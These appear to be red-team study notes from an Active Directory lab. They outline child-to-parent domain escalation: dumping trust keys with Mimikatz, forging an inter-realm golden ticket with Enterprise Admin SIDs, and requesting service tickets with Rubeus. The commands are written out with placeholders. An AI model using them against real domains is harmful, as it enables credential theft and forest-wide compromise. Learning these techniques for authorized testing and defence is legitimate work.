Escalation Requirement 🚩

Escalation Vectors 🎯

Tools

Escalation Steps

  1. Dump trust keys with Mimikatz [DA privs are required]

    Invoke-Mimikatz -Command ‘“lsadump::trust /patch”’-ComputerName DC-Name

    Invoke-Mimikatz -Command ‘“lsadump::trust /patch”’-ComputerName dcorp-dc

  2. Create Inter-realm Ticket with Mimikatz

    Invoke-Mimikatz -Command '"Kerberos::golden /user: Administrator /domain: dollarcorp.moneycorp.local [child_domain] /sid: DomainAdmin_SID /sids: Enterprise_Admin_SID /rc4: Ticket HASH /service:krbtgt /target:moneycorp.local [root domain] /ticket: location to save the ticket"'

  3. Request service tickets with Rubeus

    Rubeus.exe asktgs /ticket: ticket Location /service: service type [cifs/mcorpdc.moneycorp.local] /dc: domain controller [mcorp-dc.moneycorp.local] /ptt

    References

    Enumerating Domain Trusts in Active Directory

    From Domain Admin to Enterprise Admin

    Specifying Security and Administrative Boundaries